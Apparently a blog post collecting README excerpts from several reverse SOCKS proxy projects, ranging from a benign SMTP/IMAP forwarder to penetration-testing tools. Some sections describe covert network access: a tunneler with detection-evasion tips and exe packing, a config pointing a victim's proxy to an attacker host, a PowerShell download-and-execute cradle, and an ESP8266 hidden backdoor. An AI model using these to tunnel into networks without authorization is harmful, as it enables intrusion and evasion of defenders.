A SOCKS5 reverse proxy server.
RSOCKS is a reverse proxy server for transferring traffic of a specific host through a SOCKS5 proxy. It is useful for using SOCKS5 in applications that don't have SOCKS proxy support.
Installation
$ pip install rsocks
Or
$ easy_install rsocks
To upgrade to latest version, you could execute:
$ pip install -U rsocks
Resources
Usage
First, we need to create a config file with following format:
# /path/to/rsocks.toml [servers.foo] proxy = "socks4://user:pass@192.168.1.10:1080" listen_host = "0.0.0.0" listen_port = 5025 upstream_host = "smtp.example.com" upstream_port = 25 upstream_ssl = false
There is an example for forwarding SMTP/IMAP of Gmail through a SOCKS5 proxy server:
[servers.imap] proxy = "socks5://localhost:1080" listen_port = 5993 upstream_host = "imap.gmail.com" upstream_port = 993 upstream_ssl = true [servers.smtp] proxy = "socks5://localhost:1080" listen_port = 5465 upstream_host = "smtp.gmail.com" upstream_port = 465 upstream_ssl = true
Next, we start the rsocks server:
$ rsocks --config=/path/to/rsocks.toml [14:24:44] rsocks.servers.smtp Using proxy server socks5://localhost:1080 [14:24:44] rsocks.servers.smtp Listening 127.0.0.1:5465 [14:24:44] rsocks.servers.imap Using proxy server socks5://localhost:1080 [14:24:44] rsocks.servers.imap Listening 127.0.0.1:5993 [14:24:44] rsocks.pool Prepared "smtp" [14:24:44] rsocks.pool Prepared "imap" [14:24:44] rsocks.servers.smtp Starting server... [14:24:44] rsocks.servers.imap Starting server...
Don't stop it now, open your application (such as Airmail in OS X) and set the server option to local forwarding address:
SMTP: 127.0.0.1:5465 without SSL IMAP: 127.0.0.1:5993 without SSL
Now the application's traffic will be forwarded through the proxy server (socks5://127.0.0.1:1080).
If you wish to run the rsocks server in background, please check the Platform Service Templates. For example, OS X users can create com.tonyseek.rsocks.plist file in ~/Library/LaunchAgents and load it as a service:
$ nano ~/.rsocks.toml # create a config file
$ wget https://github.com/tonyseek/rsocks/blob/master/misc/platforms/osx-launchd/com.tonyseek.rsocks.plist \
-O ~/Library/LaunchAgents/com.tonyseek.rsocks.plist
$ nano ~/Library/LaunchAgents/com.tonyseek.rsocks.plist # edit the template
$ launchctl load -w ~/Library/LaunchAgents/com.tonyseek.rsocks.plistfrom https://github.com/tonyseek/rsocks
------
rsocks
Tiny little reverse socks5 client & server.
Usage:
rsocks - reverse socks5 server/client
https://github.com/brimstone/rsocks
Usage:
1) Start rsocks -listen :8080 -socks 127.0.0.1:1080 on the client.
2) Start rsocks -connect client:8080 on the server.
3) Connect to 127.0.0.1:1080 on the client with any socks5 client.
4) Enjoy. :]
This binary functions as both the client and the server. It does not encrypt communications.
from https://github.com/brimstone/rsocks
------
reverse socks tunneler with ntlm and proxy support.
rsockstun
Reverse socks5 tunneler with SSL and proxy support Based on https://github.com/brimstone/rsocks
Usage:
Usage:
0) Generate self-signed certificate with openssl: openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
1) Start on VPS: rsockstun -listen :8443 -socks 127.0.0.1:1080 -cert cert
2) Start on client: rsockstun -connect clientIP:8443
3) Connect to 127.0.0.1:1080 on the VPS with any socks5 client.
4) Enjoy. :]
Add params:
-proxy 1.2.3.4:3128 - connect via proxy
-proxyauth Domain/username:password - proxy creds
-proxytimeout 2000 - server and clients will wait for 2000 msec for proxy connections... (Sometime it should be up to 4000...)
-useragent "Internet Explorer 9.99" - User-Agent used in proxy connection (sometimes it is usefull)
-pass Password12345 - challenge password between client and server (if not match - server reply 301 redirect)
-recn - reconnect times number. Default is 3. If 0 - infinite reconnection
-rect - time delay in secs between reconnection attempts. Default is 30
Compile and Installation:
Linux VPS
- install Golang: apt install golang
- export GOPATH=~/go
- go get github.com/hashicorp/yamux
- go get github.com/armon/go-socks5
- go get github.com/ThomsonReutersEikon/go-ntlm/ntlm
- go build
launch:
./rsockstun -listen :8443 -socks 127.0.0.1:1080 -cert cert -agentpassword Password1234
Windows client:
- download and install golang
- go get github.com/hashicorp/yamux
- go get github.com/armon/go-socks5
- go get github.com/ThomsonReutersEikon/go-ntlm/ntlm
If you want to use proxy NTLM auth - patch go-ntlm\ntlm\payload.go packet:
bytes := utf16FromString(value) -> bytes := []byte(value)
p.Type = UnicodeStringPayload -> p.Type = OemStringPayload
- go build
optional: to build as Windows GUI: go build -ldflags -H=windowsgui
optional: to compress exe - use any exe packer, ex: UPX
launch:
rsockstun.exe -connect clientIP:8443 -agentpassword Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain\userpame:userpass -useragent "Mozilla 5.0/IE Windows 10"
Client connects to server and send agentpassword to authorize on server. If server does not receive agentpassword or reveive wrong pass from client (for example if spider or client browser connects to server ) then it send HTTP 301 redirect code to www.microsoft.com
from https://github.com/llkat/rsockstun
-----------
Cross-Platform Reverse Socks Proxy in Go.
HoleySocks
Getting Started
As a standalone binary
It's required to embed all the parameters needed to start and forward the socks server with SSH.
Do this by creating config/ssh.json and using make
cat <<EOF > configs/ssh.json
{
"ssh": {
"username": "sshuser",
"host": "attacker.demo.lan",
"port": 22
},
"socks": { "remote": "127.0.0.1:1080" }
}
EOF
makeCAUTION The generated private keys are embedded into the binary to allow for the reverse port forwarding without interaction. Follow the instructions below.
Before running the generated binaries, you'll need a user on your attacking machine for receiving the reverse ssh connection that forwards the socks proxy from the victim.
Once that user has been created, (with a homedir and /bin/false shell), append the generated pubkey in your authorized_keys file on the attacking machine.
The Makefile should generate the needed commands and entry for you when you run make.
from https://github.com/audibleblink/holeysocks
----
Reverse transparent protocol agnostic socks proxy.
A transparent reverse protocol agnostic socks proxy. It allows you to setup gateways to an onion and to hide the address of a reverse proxy from the server and the server's address from the general public. The main purpose is to allow clearnet access to tor hidden services.
To configure simply set the configuration parameters in config.py and then run:
./proxy start
It only requires root if the listener port is less than 1024.
from https://github.com/jtripper/reverse-proxy
------
PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy
PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.
Setup
Import the script:
iex (new-object net.webclient).downloadstring("http://192.168.0.22/PowerProxy.ps1")
# OR
Import-Module \\192.168.0.22\Public\PowerProxy.ps1reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn't installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the --no-encrypt option.
Usage
For detailed usage, check out PowerProxy's help, or use ./reverse_proxy_handler.py --help
Run a reverse proxy
On local machine, start the handler:
# Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080 In PowerShell:
Start-ReverseSocksProxy 172.1.1.20 -Port 8080Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:
curl --socks4 127.0.0.1:1080 http://10.10.2.69/Run a traditional SOCKS server
Start-SocksProxy 172.10.2.20 -Port 9050Require authentication
Use PSCredential objects to require a username and password:
# Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force "Passw0rd123"
$Cred = New-Object System.Management.Automation.PSCredential ("ProxyUser", $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -VerboseLimitations
- At the moment, only CONNECT requests are supported. BIND support is a goal, if practical.
- GSSAPI authentication is not supported.
- reverse_proxy_handler.py is only tested on UNIX-based machines, and probably doesn't work on Windows.
from https://github.com/get-get-get-get/PowerProxy
---------
Esp8266-reverse-socks5
Reverse http proxy, reverse tcp, reverse socks5 proxy based on the esp8266.
Once you know the wifi credential, this projects aims to setup a reverse tcp backdoor.
It can be hidden in a dropable box or any usb powered devices
Uses the esp8266 with a known wifi access point to build a reverse socks5 tunnel.
- Setup your esp-open-rtos path in the makefile
- Flash and start the esp:
make flash - wait it creates a configuration access point
- connect to http://172.16.0.1/
- configure wifi and home server
- do not forget to fill the
Security checkwith the serial id as returned bysdk_system_get_chip_id() - reboot
Socks5 proxy
On the server side:
python main.py -s -r 8888 -l 8889
And then connect to localhost:8889 with a socks5 client to access the remote network. For ssh, it would be:
ssh -v -o ProxyCommand='nc -X 5 -x 127.0.0.1:8889 %h %p' 192.168.x.x # remote local machine
HTTP proxy
On the server side:
python main.py -p -r 8888 -l 8889
HTTP_PROXY="127.0.0.1:8889" wget http://hackaday.com
Raw TCP socket
On the server side:
python main.py -r 8888 -l 8889
echo "hello from server" | nc localhost 8889
from https://github.com/mehdilauters/esp8266-reverse-socks5
-------
https://github.com/IdoBn/skcos
No comments:
Post a Comment